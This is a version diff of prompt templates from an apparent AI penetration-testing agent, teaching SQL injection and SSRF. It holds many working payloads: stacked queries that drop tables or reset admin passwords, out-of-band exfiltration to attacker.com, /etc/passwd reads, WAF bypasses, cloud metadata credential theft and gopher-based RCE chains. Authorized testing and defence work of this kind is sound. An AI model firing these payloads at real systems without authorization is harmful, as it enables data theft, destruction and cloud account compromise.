strix-agent 0.1.18__py3-none-any.whl → 0.3.1__py3-none-any.whl

strix/prompts/vulnerabilities/sql_injection.jinja

@@ -1,215 +1,151 @@
 <sql_injection_guide>
-<title>SQL INJECTION - MASTER CLASS TECHNIQUES</title>
-
-<critical>SQL Injection = direct database access = game over.</critical>
-
-<injection_points>
-- URL parameters: ?id=1
-- POST body parameters
-- HTTP headers: User-Agent, Referer, X-Forwarded-For
-- Cookie values
-- JSON/XML payloads
-- File upload names
-- Session identifiers
-</injection_points>
-
-<detection_techniques>
-- Time-based: ' AND SLEEP(5)--
-- Boolean-based: ' AND '1'='1 vs ' AND '1'='2
-- Error-based: ' (provoke verbose errors)
-- Out-of-band: DNS/HTTP callbacks
-- Differential response: content length changes
-- Second-order: stored and triggered later
-</detection_techniques>
-
-<uncommon_contexts>
-- ORDER BY: (CASE WHEN condition THEN 1 ELSE 2 END)
-- GROUP BY: GROUP BY id HAVING 1=1--
-- INSERT: INSERT INTO users VALUES (1,'admin',(SELECT password FROM admins))--
-- UPDATE: UPDATE users SET email=(SELECT @@version) WHERE id=1
-- Functions: WHERE MATCH(title) AGAINST((SELECT password FROM users LIMIT 1))
-</uncommon_contexts>
-
-<basic_payloads>
-<union_based>
-' UNION SELECT null--
-' UNION SELECT null,null--
-' UNION SELECT 1,2,3--
-' UNION SELECT 1,@@version,3--
-' UNION ALL SELECT 1,database(),3--
-</union_based>
-
-<error_based>
-' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))--
-' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)--
-' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
-</error_based>
-
-<blind_boolean>
-' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'--
-' AND ASCII(SUBSTRING((SELECT database()),1,1))>97--
-' AND (SELECT COUNT(*) FROM users)>5--
-</blind_boolean>
-
-<blind_time>
-' AND IF(1=1,SLEEP(5),0)--
-' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--
-'; WAITFOR DELAY '0:0:5'-- (MSSQL)
-'; SELECT pg_sleep(5)-- (PostgreSQL)
-</blind_time>
-</basic_payloads>
-
-<advanced_techniques>
-<stacked_queries>
-'; DROP TABLE users--
-'; INSERT INTO admins VALUES ('hacker','password')--
-'; UPDATE users SET password='hacked' WHERE username='admin'--
-</stacked_queries>
-
-<out_of_band>
-MySQL:
-' AND LOAD_FILE(CONCAT('\\\\',database(),'.attacker.com\\a'))--
-' UNION SELECT LOAD_FILE('/etc/passwd')--
-
-MSSQL:
-'; EXEC xp_dirtree '\\attacker.com\share'--
-'; EXEC xp_cmdshell 'nslookup attacker.com'--
-
-PostgreSQL:
-'; CREATE EXTENSION dblink; SELECT dblink_connect('host=attacker.com')--
-</out_of_band>
-
-<file_operations>
-MySQL:
-' UNION SELECT 1,2,LOAD_FILE('/etc/passwd')--
-
-MSSQL:
-'; EXEC xp_cmdshell 'type C:\Windows\win.ini'--
-
-PostgreSQL:
-'; CREATE TABLE test(data text); COPY test FROM '/etc/passwd'--
-</file_operations>
-</advanced_techniques>
-
-<filter_bypasses>
-<space_bypass>
-- Comments: /**/
-- Parentheses: UNION(SELECT)
-- Backticks: UNION`SELECT`
-- Newlines: %0A, %0D
-- Tabs: %09
-</space_bypass>
-
-<keyword_bypass>
-- Case variation: UnIoN SeLeCt
-- Comments: UN/**/ION SE/**/LECT
-- Encoding: %55nion %53elect
-- Double words: UNUNIONION SESELECTLECT
-</keyword_bypass>
-
-<waf_bypasses>
-- HTTP Parameter Pollution: id=1&id=' UNION SELECT
-- JSON/XML format switching
-- Chunked encoding
-- Unicode normalization
-- Scientific notation: 1e0 UNION SELECT
-</waf_bypasses>
-</filter_bypasses>
-
-<specific_databases>
+<title>SQL INJECTION</title>
+
+<critical>SQLi remains one of the most durable and impactful classes. Modern exploitation focuses on parser differentials, ORM/query-builder edges, JSON/XML/CTE/JSONB surfaces, out-of-band exfiltration, and subtle blind channels. Treat every string concatenation into SQL as suspect.</critical>
+
+<scope>
+- Classic relational DBMS: MySQL/MariaDB, PostgreSQL, MSSQL, Oracle
+- Newer surfaces: JSON/JSONB operators, full-text/search, geospatial, window functions, CTEs, lateral joins
+- Integration paths: ORMs, query builders, stored procedures, search servers, reporting/exporters
+</scope>
+
+<methodology>
+1. Identify query shape: SELECT/INSERT/UPDATE/DELETE, presence of WHERE/ORDER/GROUP/LIMIT/OFFSET, and whether user input influences identifiers vs values.
+2. Confirm injection class: reflective errors, boolean diffs, timing, or out-of-band callbacks. Choose the quietest reliable oracle.
+3. Establish a minimal extraction channel: UNION (if visible), error-based, boolean bit extraction, time-based, or OAST/DNS.
+4. Pivot to metadata and high-value tables, then target impactful write primitives (auth bypass, role changes, filesystem access) if feasible.
+</methodology>
+
+<injection_surfaces>
+- Path/query/body/header/cookie; mixed encodings (URL, JSON, XML, multipart)
+- Identifier vs value: table/column names (require quoting/escaping) vs literals (quotes/CAST requirements)
+- Query builders: whereRaw/orderByRaw, string templates in ORMs; JSON coercion or array containment operators
+- Batch/bulk endpoints and report generators that embed filters directly
+</injection_surfaces>
+
+<detection_channels>
+- Error-based: provoke type/constraint/parser errors revealing stack/version/paths
+- Boolean-based: pair requests differing only in predicate truth; diff status/body/length/ETag
+- Time-based: SLEEP/pg_sleep/WAITFOR; use subselect gating to avoid global latency noise
+- Out-of-band (OAST): DNS/HTTP callbacks via DB-specific primitives
+</detection_channels>
+
+<union_visibility>
+- Determine column count and types via ORDER BY n and UNION SELECT null,...
+- Align types with CAST/CONVERT; coerce to text/json for rendering
+- When UNION is filtered, consider error-based or blind channels
+</union_visibility>
+
+<dbms_primitives>
 <mysql>
-- Version: @@version
-- Database: database()
-- User: user(), current_user()
-- Tables: information_schema.tables
-- Columns: information_schema.columns
+- Version/user/db: @@version, database(), user(), current_user()
+- Error-based: extractvalue()/updatexml() (older), JSON functions for error shaping
+- File IO: LOAD_FILE(), SELECT ... INTO DUMPFILE/OUTFILE (requires FILE privilege, secure_file_priv)
+- OOB/DNS: LOAD_FILE(CONCAT('\\\\',database(),'.attacker.com\\a'))
+- Time: SLEEP(n), BENCHMARK
+- JSON: JSON_EXTRACT/JSON_SEARCH with crafted paths; GIS funcs sometimes leak
 </mysql>
 
-<mssql>
-- Version: @@version
-- Database: db_name()
-- User: user_name(), system_user
-- Tables: sysobjects WHERE xtype='U'
-- Enable xp_cmdshell: sp_configure 'xp_cmdshell',1;RECONFIGURE
-</mssql>
-
 <postgresql>
-- Version: version()
-- Database: current_database()
-- User: current_user
-- Tables: pg_tables
-- Command execution: CREATE EXTENSION
+- Version/user/db: version(), current_user, current_database()
+- Error-based: raise exception via unsupported casts or division by zero; xpath() errors in xml2
+- OOB: COPY (program ...) or dblink/foreign data wrappers (when enabled); http extensions
+- Time: pg_sleep(n)
+- Files: COPY table TO/FROM '/path' (requires superuser), lo_import/lo_export
+- JSON/JSONB: operators ->, ->>, @>, ?| with lateral/CTE for blind extraction
 </postgresql>
 
+<mssql>
+- Version/db/user: @@version, db_name(), system_user, user_name()
+- OOB/DNS: xp_dirtree, xp_fileexist; HTTP via OLE automation (sp_OACreate) if enabled
+- Exec: xp_cmdshell (often disabled), OPENROWSET/OPENDATASOURCE
+- Time: WAITFOR DELAY '0:0:5'; heavy functions cause measurable delays
+- Error-based: convert/parse, divide by zero, FOR XML PATH leaks
+</mssql>
+
 <oracle>
-- Version: SELECT banner FROM v$version
-- Database: SELECT ora_database_name FROM dual
-- User: SELECT user FROM dual
-- Tables: all_tables
+- Version/db/user: banner from v$version, ora_database_name, user
+- OOB: UTL_HTTP/DBMS_LDAP/UTL_INADDR/HTTPURITYPE (permissions dependent)
+- Time: dbms_lock.sleep(n)
+- Error-based: to_number/to_date conversions, XMLType
+- File: UTL_FILE with directory objects (privileged)
 </oracle>
-</specific_databases>
-
-<nosql_injection>
-<mongodb>
-{% raw %}{"username": {"$ne": null}, "password": {"$ne": null}}{% endraw %}
-{% raw %}{"$where": "this.username == 'admin'"}{% endraw %}
-{% raw %}{"username": {"$regex": "^admin"}}{% endraw %}
-</mongodb>
-
-<graphql>
-{users(where:{OR:[{id:1},{id:2}]}){id,password}}
-{__schema{types{name,fields{name}}}}
-</graphql>
-</nosql_injection>
-
-<automation>
-SQLMap flags:
-- Risk/Level: --risk=3 --level=5
-- Bypass WAF: --tamper=space2comment,between
-- OS Shell: --os-shell
-- Database dump: --dump-all
-- Specific technique: --technique=T (time-based)
-</automation>
+</dbms_primitives>
+
+<blind_extraction>
+- Branch on single-bit predicates using SUBSTRING/ASCII, LEFT/RIGHT, or JSON/array operators
+- Binary search on character space for fewer requests; encode outputs (hex/base64) to normalize
+- Gate delays inside subqueries to reduce noise: AND (SELECT CASE WHEN (predicate) THEN pg_sleep(0.5) ELSE 0 END)
+</blind_extraction>
+
+<out_of_band>
+- Prefer OAST to minimize noise and bypass strict response paths; embed data in DNS labels or HTTP query params
+- MSSQL: xp_dirtree \\\\<data>.attacker.tld\\a; Oracle: UTL_HTTP.REQUEST('http://<data>.attacker'); MySQL: LOAD_FILE with UNC
+</out_of_band>
+
+<write_primitives>
+- Auth bypass: inject OR-based tautologies or subselects into login checks
+- Privilege changes: update role/plan/feature flags when UPDATE is injectable
+- File write: INTO OUTFILE/DUMPFILE, COPY TO, xp_cmdshell redirection; aim for webroot only when feasible and legal
+- Job/proc abuse: schedule tasks or create procedures/functions when permissions allow
+</write_primitives>
+
+<waf_and_parser_bypasses>
+- Whitespace/spacing: /**/, /**/!00000, comments, newlines, tabs, 0xe3 0x80 0x80 (ideographic space)
+- Keyword splitting/concatenation: UN/**/ION, U%4eION, backticks/quotes, case folding
+- Numeric tricks: scientific notation, signed/unsigned, hex (0x61646d696e)
+- Encodings: double URL encoding, mixed Unicode normalizations (NFKC/NFD), char()/CONCAT_ws to build tokens
+- Clause relocation: subselects, derived tables, CTEs (WITH), lateral joins to hide payload shape
+</waf_and_parser_bypasses>
+
+<orm_and_query_builders>
+- Dangerous APIs: whereRaw/orderByRaw, string interpolation into LIKE/IN/ORDER clauses
+- Injections via identifier quoting (table/column names) when user input is interpolated into identifiers
+- JSON containment operators exposed by ORMs (e.g., @> in PostgreSQL) with raw fragments
+- Parameter mismatch: partial parameterization where operators or lists remain unbound (IN (...))
+</orm_and_query_builders>
+
+<uncommon_contexts>
+- ORDER BY/GROUP BY/HAVING with CASE WHEN for boolean channels
+- LIMIT/OFFSET: inject into OFFSET to produce measurable timing or page shape
+- Full-text/search helpers: MATCH AGAINST, to_tsvector/to_tsquery with payload mixing
+- XML/JSON functions: error generation via malformed documents/paths
+</uncommon_contexts>
 
 <validation>
-To confirm SQL injection:
-1. Demonstrate database version extraction
-2. Show database/table enumeration
-3. Extract actual data
-4. Prove query manipulation
-5. Document consistent exploitation
+1. Show a reliable oracle (error/boolean/time/OAST) and prove control by toggling predicates.
+2. Extract verifiable metadata (version, current user, database name) using the established channel.
+3. Retrieve or modify a non-trivial target (table rows, role flag) within legal scope.
+4. Provide reproducible requests that differ only in the injected fragment.
+5. Where applicable, demonstrate defense-in-depth bypass (WAF on, still exploitable via variant).
 </validation>
 
 <false_positives>
-NOT SQLi if:
-- Only generic errors
-- No time delays work
-- Same response for all payloads
-- Parameterized queries properly used
-- Input validation effective
+- Generic errors unrelated to SQL parsing or constraints
+- Static response sizes due to templating rather than predicate truth
+- Artificial delays from network/CPU unrelated to injected function calls
+- Parameterized queries with no string concatenation, verified by code review
 </false_positives>
 
 <impact>
-- Database content theft
-- Authentication bypass
-- Data manipulation
-- Command execution (xp_cmdshell)
-- File system access
-- Complete database takeover
+- Direct data exfiltration and privacy/regulatory exposure
+- Authentication and authorization bypass via manipulated predicates
+- Server-side file access or command execution (platform/privilege dependent)
+- Persistent supply-chain impact via modified data, jobs, or procedures
 </impact>
 
 <pro_tips>
-1. Always try UNION SELECT first
-2. Use sqlmap for automation
-3. Test all HTTP headers
-4. Try different encodings
-5. Check for second-order SQLi
-6. Test JSON/XML parameters
-7. Look for error messages
-8. Try time-based for blind
-9. Check INSERT/UPDATE contexts
-10. Focus on data extraction
+1. Pick the quietest reliable oracle first; avoid noisy long sleeps.
+2. Normalize responses (length/ETag/digest) to reduce variance when diffing.
+3. Aim for metadata then jump directly to business-critical tables; minimize lateral noise.
+4. When UNION fails, switch to error- or blind-based bit extraction; prefer OAST when available.
+5. Treat ORMs as thin wrappers: raw fragments often slip through; audit whereRaw/orderByRaw.
+6. Use CTEs/derived tables to smuggle expressions when filters block SELECT directly.
+7. Exploit JSON/JSONB operators in Postgres and JSON functions in MySQL for side channels.
+8. Keep payloads portable; maintain DBMS-specific dictionaries for functions and types.
+9. Validate mitigations with negative tests and code review; parameterize operators/lists correctly.
+10. Document exact query shapes; defenses must match how the query is constructed, not assumptions.
 </pro_tips>
 
-<remember>Modern SQLi requires bypassing WAFs and dealing with complex queries. Focus on extracting sensitive data - passwords, API keys, PII. Time-based blind SQLi works when nothing else does.</remember>
+<remember>Modern SQLi succeeds where authorization and query construction drift from assumptions. Bind parameters everywhere, avoid dynamic identifiers, and validate at the exact boundary where user input meets SQL.</remember>
 </sql_injection_guide>

strix/prompts/vulnerabilities/ssrf.jinja

@@ -1,168 +1,135 @@
 <ssrf_vulnerability_guide>
-<title>SERVER-SIDE REQUEST FORGERY (SSRF) - ADVANCED EXPLOITATION</title>
-
-<critical>SSRF can lead to internal network access, cloud metadata theft, and complete infrastructure compromise.</critical>
-
-<common_injection_points>
-- URL parameters: url=, link=, path=, src=, href=, uri=
-- File import/export features
-- Webhooks and callbacks
-- PDF generators (wkhtmltopdf)
-- Image processing (ImageMagick)
-- Document parsers
-- Payment gateways (IPN callbacks)
-- Social media card generators
-- URL shorteners/expanders
-</common_injection_points>
-
-<hidden_contexts>
-- Referer headers in analytics
-- Link preview generation
-- RSS/Feed fetchers
-- Repository cloning (Git/SVN)
-- Package managers (npm, pip)
-- Calendar invites (ICS files)
-- OAuth redirect_uri
-- SAML endpoints
-- GraphQL field resolvers
-</hidden_contexts>
-
-<cloud_metadata>
+<title>SERVER-SIDE REQUEST FORGERY (SSRF)</title>
+
+<critical>SSRF enables the server to reach networks and services the attacker cannot. Focus on cloud metadata endpoints, service meshes, Kubernetes, and protocol abuse to turn a single fetch into credentials, lateral movement, and sometimes RCE.</critical>
+
+<scope>
+- Outbound HTTP/HTTPS fetchers (proxies, previewers, importers, webhook testers)
+- Non-HTTP protocols via URL handlers (gopher, dict, file, ftp, smb wrappers)
+- Service-to-service hops through gateways and sidecars (envoy/nginx)
+- Cloud and platform metadata endpoints, instance services, and control planes
+</scope>
+
+<methodology>
+1. Identify every user-influenced URL/host/path across web/mobile/API and background jobs. Include headers that trigger server-side fetches (link previews, analytics, crawler hooks).
+2. Establish a quiet oracle first (OAST DNS/HTTP callbacks). Then pivot to internal addressing (loopback, RFC1918, link-local, IPv6, hostnames) and protocol variations.
+3. Enumerate redirect behavior, header propagation, and method control (GET-only vs arbitrary). Test parser differentials across frameworks, CDNs, and language libraries.
+4. Target high-value services (metadata, kubelet, Redis, FastCGI, Docker, Vault, internal admin panels). Chain to write/exec primitives if possible.
+</methodology>
+
+<injection_surfaces>
+- Direct URL params: url=, link=, fetch=, src=, webhook=, avatar=, image=
+- Indirect sources: Open Graph/link previews, PDF/image renderers, server-side analytics (Referer trackers), import/export jobs, webhooks/callback verifiers
+- Protocol-translating services: PDF via wkhtmltopdf/Chrome headless, image pipelines, document parsers, SSO validators, archive expanders
+- Less obvious: GraphQL resolvers that fetch by URL, background crawlers, repository/package managers (git, npm, pip), calendar (ICS) fetchers
+</injection_surfaces>
+
+<cloud_and_platforms>
 <aws>
-Legacy: http://169.254.169.254/latest/meta-data/
-IMDSv2: Requires token but check if app proxies headers
-Key targets: /iam/security-credentials/, /user-data/
+- IMDSv1: http://169.254.169.254/latest/meta-data/ → {% raw %}/iam/security-credentials/{role}{% endraw %}, {% raw %}/user-data{% endraw %}
+- IMDSv2: requires token via PUT {% raw %}/latest/api/token{% endraw %} with header {% raw %}X-aws-ec2-metadata-token-ttl-seconds{% endraw %}, then include {% raw %}X-aws-ec2-metadata-token{% endraw %} on subsequent GETs. If the sink cannot set headers or methods, fallback to other targets or seek intermediaries that can
+- ECS/EKS task credentials: {% raw %}http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI{% endraw %}
 </aws>
 
-<google_cloud>
-http://metadata.google.internal/computeMetadata/v1/
-Requires: Metadata-Flavor: Google header
-Target: /instance/service-accounts/default/token
-</google_cloud>
+<gcp>
+- Endpoint: http://metadata.google.internal/computeMetadata/v1/
+- Required header: {% raw %}Metadata-Flavor: Google{% endraw %}
+- Target: {% raw %}/instance/service-accounts/default/token{% endraw %}
+</gcp>
 
 <azure>
-http://169.254.169.254/metadata/instance?api-version=2021-02-01
-Requires: Metadata: true header
-OAuth: /metadata/identity/oauth2/token
+- Endpoint: http://169.254.169.254/metadata/instance?api-version=2021-02-01
+- Required header: {% raw %}Metadata: true{% endraw %}
+- MSI OAuth: {% raw %}/metadata/identity/oauth2/token{% endraw %}
 </azure>
-</cloud_metadata>
-
-<internal_services>
-<port_scanning>
-Common ports: 21,22,80,443,445,1433,3306,3389,5432,6379,8080,9200,27017
-</port_scanning>
-
-<service_fingerprinting>
-- Elasticsearch: http://localhost:9200/_cat/indices
-- Redis: dict://localhost:6379/INFO
-- MongoDB: http://localhost:27017/test
-- Docker: http://localhost:2375/v1.24/containers/json
-- Kubernetes: https://kubernetes.default.svc/api/v1/
-</service_fingerprinting>
-</internal_services>
+
+<kubernetes>
+- Kubelet: 10250 (authenticated) and 10255 (deprecated read-only). Probe {% raw %}/pods{% endraw %}, {% raw %}/metrics{% endraw %}, exec/attach endpoints
+- API server: https://kubernetes.default.svc/. Authorization often needs the service account token; SSRF that propagates headers/cookies may reuse them
+- Service discovery: attempt cluster DNS names (svc.cluster.local) and default services (kube-dns, metrics-server)
+</kubernetes>
+</cloud_and_platforms>
+
+<internal_targets>
+- Docker API: http://localhost:2375/v1.24/containers/json (no TLS variants often internal-only)
+- Redis/Memcached: dict://localhost:11211/stat, gopher payloads to Redis on 6379
+- Elasticsearch/OpenSearch: http://localhost:9200/_cat/indices
+- Message brokers/admin UIs: RabbitMQ, Kafka REST, Celery/Flower, Jenkins crumb APIs
+- FastCGI/PHP-FPM: gopher://localhost:9000/ (craft records for file write/exec when app routes to FPM)
+</internal_targets>
 
 <protocol_exploitation>
 <gopher>
-Redis RCE, SMTP injection, FastCGI exploitation
+- Speak raw text protocols (Redis/SMTP/IMAP/HTTP/FCGI). Use to craft multi-line payloads, schedule cron via Redis, or build FastCGI requests
 </gopher>
 
-<file>
-file:///etc/passwd, file:///proc/self/environ
-</file>
-
-<dict>
-dict://localhost:11211/stat (Memcached)
-</dict>
-</protocol_exploitation>
-
-<bypass_techniques>
-<dns_rebinding>
-First request → your server, second → 127.0.0.1
-</dns_rebinding>
-
-<encoding_tricks>
-- Decimal IP: http://2130706433/ (127.0.0.1)
-- Octal: http://0177.0.0.1/
-- Hex: http://0x7f.0x0.0x0.0x1/
-- IPv6: http://[::1]/, http://[::ffff:127.0.0.1]/
-</encoding_tricks>
-
-<url_parser_confusion>
-- Authority: http://expected@evil/
-- Unicode: http://⑯⑨。②⑤④。⑯⑨。②⑤④/
-</url_parser_confusion>
-
-<redirect_chains>
-302 → yourserver.com → 169.254.169.254
-</redirect_chains>
-</bypass_techniques>
-
-<advanced_techniques>
-<blind_ssrf>
-- DNS exfiltration: http://$(hostname).attacker.com/
-- Timing attacks for network mapping
-- Error-based detection
-</blind_ssrf>
-
-<ssrf_to_rce>
-- Redis: gopher://localhost:6379/ (cron injection)
-- Memcached: gopher://localhost:11211/
-- FastCGI: gopher://localhost:9000/
-</ssrf_to_rce>
-</advanced_techniques>
-
-<filter_bypasses>
-<localhost>
-127.1, 0177.0.0.1, 0x7f000001, 2130706433, 127.0.0.0/8, localtest.me
-</localhost>
-
-<parser_differentials>
-http://evil.com#@good.com/, http:evil.com
-</parser_differentials>
-
-<protocols>
-dict://, gopher://, ftp://, file://, jar://, netdoc://
-</protocols>
-</filter_bypasses>
-
-<validation_techniques>
-To confirm SSRF:
-1. External callbacks (DNS/HTTP)
-2. Internal network access (different responses)
-3. Time-based detection (timeouts)
-4. Cloud metadata retrieval
-5. Protocol differentiation
-</validation_techniques>
-
-<false_positive_indicators>
-NOT SSRF if:
-- Only client-side redirects
-- Whitelist properly blocking
-- Generic errors for all URLs
-- No outbound requests made
-- Same-origin policy enforced
-</false_positive_indicators>
-
-<impact_demonstration>
-- Cloud credential theft (AWS/GCP/Azure)
-- Internal admin panel access
-- Port scanning results
-- SSRF to RCE chain
-- Data exfiltration
-</impact_demonstration>
+<file_and_wrappers>
+- file:///etc/passwd, file:///proc/self/environ when libraries allow file handlers
+- jar:, netdoc:, smb:// and language-specific wrappers (php://, expect://) where enabled
+</file_and_wrappers>
+
+<parser_and_filter_bypasses>
+<address_variants>
+- Loopback: 127.0.0.1, 127.1, 2130706433, 0x7f000001, ::1, [::ffff:127.0.0.1]
+- RFC1918/link-local: 10/8, 172.16/12, 192.168/16, 169.254/16; test IPv6-mapped and mixed-notation forms
+</address_variants>
+
+<url_confusion>
+- Userinfo and fragments: http://internal@attacker/ or http://attacker#@internal/
+- Scheme-less/relative forms the server might complete internally: //169.254.169.254/
+- Trailing dots and mixed case: internal. vs INTERNAL, Unicode dot lookalikes
+</url_confusion>
+
+<redirect_behavior>
+- Allowlist only applied pre-redirect: 302 from attacker → internal host. Test multi-hop and protocol switches (http→file/gopher via custom clients)
+</redirect_behavior>
+
+<header_and_method_control>
+- Some sinks reflect or allow CRLF-injection into the request line/headers; if arbitrary headers/methods are possible, IMDSv2, GCP, and Azure become reachable
+</header_and_method_control>
+
+<blind_and_mapping>
+- Use OAST (DNS/HTTP) to confirm egress. Derive internal reachability from timing, response size, TLS errors, and ETag differences
+- Build a port map by binary searching timeouts (short connect/read timeouts yield cleaner diffs)
+</blind_and_mapping>
+
+<chaining>
+- SSRF → Metadata creds → cloud API access (list buckets, read secrets)
+- SSRF → Redis/FCGI/Docker → file write/command execution → shell
+- SSRF → Kubelet/API → pod list/logs → token/secret discovery → lateral
+</chaining>
+
+<validation>
+1. Prove an outbound server-initiated request occurred (OAST interaction or internal-only response differences).
+2. Show access to non-public resources (metadata, internal admin, service ports) from the vulnerable service.
+3. Where possible, demonstrate minimal-impact credential access (short-lived token) or a harmless internal data read.
+4. Confirm reproducibility and document request parameters that control scheme/host/headers/method and redirect behavior.
+</validation>
+
+<false_positives>
+- Client-side fetches only (no server request)
+- Strict allowlists with DNS pinning and no redirect following
+- SSRF simulators/mocks returning canned responses without real egress
+- Blocked egress confirmed by uniform errors across all targets and protocols
+</false_positives>
+
+<impact>
+- Cloud credential disclosure with subsequent control-plane/API access
+- Access to internal control panels and data stores not exposed publicly
+- Lateral movement into Kubernetes, service meshes, and CI/CD
+- RCE via protocol abuse (FCGI, Redis), Docker daemon access, or scriptable admin interfaces
+</impact>
 
 <pro_tips>
-1. Always check cloud metadata first
-2. Chain with other vulns (SSRF + XXE)
-3. Use time delays for blind SSRF
-4. Try all protocols, not just HTTP
-5. Automate internal network scanning
-6. Check parser quirks (language-specific)
-7. Monitor DNS for blind confirmation
-8. Try IPv6 (often forgotten)
-9. Abuse redirects for filter bypass
-10. SSRF can be in any URL-fetching feature
+1. Prefer OAST callbacks first; then iterate on internal addressing and protocols.
+2. Test IPv6 and mixed-notation addresses; filters often ignore them.
+3. Observe library/client differences (curl, Java HttpClient, Node, Go); behavior changes across services and jobs.
+4. Redirects are leverage: control both the initial allowlisted host and the next hop.
+5. Metadata endpoints require headers/methods; verify if your sink can set them or if intermediaries add them for you.
+6. Use tiny payloads and tight timeouts to map ports with minimal noise.
+7. When responses are masked, diff length/ETag/status and TLS error classes to infer reachability.
+8. Chain quickly to durable impact (short-lived tokens, harmless internal reads) and stop there.
 </pro_tips>
 
-<remember>SSRF is often the key to cloud compromise. A single SSRF in cloud = complete account takeover through metadata access.</remember>
+<remember>Any feature that fetches remote content on behalf of a user is a potential tunnel to internal networks and control planes. Bind scheme/host/port/headers explicitly or expect an attacker to route through them.</remember>
 </ssrf_vulnerability_guide>